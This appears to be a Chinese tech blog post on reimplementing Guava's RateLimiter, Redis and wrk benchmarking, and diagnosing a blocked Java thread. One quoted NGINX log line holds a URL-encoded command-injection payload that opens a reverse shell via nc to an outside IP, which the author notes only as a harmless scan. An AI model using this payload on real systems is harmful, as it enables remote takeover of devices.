Guava RateLimiter

参考 RateLimiter 代码。

基本使用

1
2
3
4
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
</dependency>
1
2
RateLimiter rateLimiter = RateLimiter.create(1);
rateLimiter.acquire();

代码实现

抽取 SmoothBursty 限流器的关键代码,梳理基本的实现流程。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
class RateLimiter {

/**
* 最多可以存储多少秒的许可来应对突发流量
*/
private final double maxBurstSeconds;

/**
* 允许存储的最大许可数量
*/
private final double maxPermits;

/**
* 生成许可的间隔时间
*/
private final double stableIntervalMicros;

/**
* 当前存储的许可数量
*/
private double storedPermits;

/**
* 允许下一个请求获取许可的时间
*/
private long nextFreeTicketMicros = 0L;

/**
* 每秒生成的许可数量
*/
RateLimiter(double permitsPerSecond) {
this.maxBurstSeconds = 1.0;
maxPermits = maxBurstSeconds * permitsPerSecond;
stableIntervalMicros = TimeUnit.SECONDS.toMicros(1L) / permitsPerSecond;
}

/**
* 获取指定数量的许可,阻塞请求知道可以获取,返回等待的时间(秒)
*/
public double acquire(int permits) {
// 参数范围检查
if (permits <= 0) {
throw new IllegalArgumentException(String.format("Requested permits (%s) must be positive", permits));
}
long microsToWait;
// 加锁保证线程安全
synchronized (this) {
Instant instant = Instant.now();
long nowMicros = instant.getEpochSecond() * 1_000_000 + instant.getNano() / 1000;
long momentAvailable = reserveEarliestAvailable(permits, nowMicros);
microsToWait = max(momentAvailable - nowMicros, 0);
}
LockSupport.parkNanos(microsToWait * 1000);
return 1.0 * microsToWait / SECONDS.toMicros(1L);
}

/**
* 返回当前请求允许获取许可的时间,设置当前存储的许可数量,以及下一个请求允许获取许可的时间
*/
final long reserveEarliestAvailable(int requiredPermits, long nowMicros) {
// 如果当前时间大于 nextFreeTicket,则重新生成当前时间存储的许可数量,以及当前请求允许获取许可的时间
if (nowMicros > nextFreeTicketMicros) {
double newPermits = (nowMicros - nextFreeTicketMicros) / stableIntervalMicros;
storedPermits = min(maxPermits, storedPermits + newPermits);
nextFreeTicketMicros = nowMicros;
}
// 存储当前请求允许获取许可的时间作为返回值
long returnValue = nextFreeTicketMicros;
// 消耗已有的许可数量,然后根据需要新获取的许可数量,生成下一次请求的等待时间
double storedPermitsToSpend = min(requiredPermits, this.storedPermits);
double freshPermits = requiredPermits - storedPermitsToSpend;
long waitMicros = (long) (freshPermits * stableIntervalMicros);
// 将等待时间添加到 nextFreeTicketMicros 中,如果溢出则设置为 Long.MAX_VALUE
try {
nextFreeTicketMicros = Math.addExact(nextFreeTicketMicros, waitMicros);
} catch (ArithmeticException e) {
nextFreeTicketMicros = Long.MAX_VALUE;
}
storedPermits -= storedPermitsToSpend;
return returnValue;
}

public static void main(String[] args) {
RateLimiter rateLimiter = new RateLimiter(1);
for (int i = 0; i < 10; i++) {
double wait = rateLimiter.acquire(2);
System.out.printf("等待时间: %fs, 剩余许可: %f\n", wait, rateLimiter.storedPermits);
}
}
}
1
2
3
4
5
6
7
8
// 当前时间大于 nextFreeTicket,生成 maxPermits 个许可
// 请求 2 个许可,当前只有 1 个许可,等待 0 s,下一个请求的等待时间是 1 s
等待时间: 0.000000s, 剩余许可: 0.000000
// 请求 2 个许可,当前只有 0 个许可,等待 1 s,下一个请求的等待时间是 2 s
等待时间: 0.967138s, 剩余许可: 0.000000
// 请求 2 个许可,当前只有 0 个许可,等待 2 s,下一个请求的等待时间是 2 s
等待时间: 1.981604s, 剩余许可: 0.000000
等待时间: 1.989831s, 剩余许可: 0.000000

性能测试

服务器硬件配置是 2 核 2 GB 内存,对 Redis Get 命令进行基准测试的 RPS 是 7w+,而应用程序接口会将数据缓存到 Redis,即使每次都命中缓存 RPS 却只有 1k+。

1
2
3
4
5
6
7
8
9
$ lscpu
Architecture: x86_64
CPU(s): 2
CPU MHz: 2499.998

$ free -h
total used free shared buff/cache available
Mem: 1.8Gi 1.3Gi 140Mi 1.0Mi 551Mi 545Mi
Swap: 0B 0B 0B
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ redis-benchmark -t get -c 50 -n 100000 -d 8 -P 1
====== GET ======
100000 requests completed in 1.41 seconds
50 parallel clients
8 bytes payload
keep alive: 1
host configuration "save": 3600 1 300 100 60 10000
host configuration "appendonly": no
multi-thread: no

Summary:
throughput summary: 70972.32 requests per second
latency summary (msec):
avg min p50 p95 p99 max
0.478 0.144 0.407 0.863 1.183 10.327
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ wrk -t4 -c100 -d30s --latency http://127.0.0.1:8080/predict/biweekly-contest-152/1/25
Running 30s test @ http://127.0.0.1:8080/predict/biweekly-contest-152/1/25
4 threads and 100 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 75.57ms 32.14ms 490.57ms 85.10%
Req/Sec 337.43 69.15 530.00 76.79%
Latency Distribution
50% 71.32ms
75% 85.89ms
90% 103.88ms
99% 201.92ms
40414 requests in 30.11s, 269.38MB read
Requests/sec: 1342.26
Transfer/sec: 8.95MB

线程阻塞在 at sun.nio.ch.SocketDispatcher.read0

问题排查

定时任务一直没有完成,使用 jpsjstack -l [PID] 查看线程状态,使用 jstack.review 分析转储文件。发现线程池的线程阻塞在本地方法中,然后查看 Hutool 的文档,发现默认配置下 HTTP 请求是不会超时的,设置超时时间应该可以解决这个问题。(参考 How to Analyze Java Thread Dumps

1
2
3
"pool-41-thread-2" #226773 prio=5 os_prio=0 cpu=6566.92ms elapsed=506952.44s tid=0x00007f66ec022640 nid=0x6188f runnable  [0x00007f66f98ea000]
java.lang.Thread.State: RUNNABLE
at sun.nio.ch.SocketDispatcher.read0(java.base@17.0.12/Native Method)

另外,使用 top -H -p [PID] 命令,可以查看指定进程的线程状态,发现都是 S 状态。使用 netstat -antp 可以查看 TCP 连接状态。顺便看下 NGINX 日志,发现有不少奇怪的请求,应该是攻击请求,不过没什么影响。

1
2
196.251.69.180 - - [15/Mar/2025:10:00:32 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+196.251.69.180+61781+%3E%2Ftmp%2Ff%
29 HTTP/1.1" 200 760 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-"

常用命令

1
2
3
4
5
6
7
8
uname -m, whoami, pwd, jobs, ctrl-z + [bg | fg]
wget, scp, tar -xvf [file], curl -X POST [url]
systemctl [start | stop | restart | status] xxx
nohup java -jar xxx.jar > /dev/null 2>&1 &
ps -aux | grep xxx, kill [pid]
top -H -p [pid], netstat -antp
jps, jstack -l [pid], jmap -dump:format=b,file=heap.hprof [pid]
jmeter -n -t "xxx.jmx", jmeter -g result.jtl -o result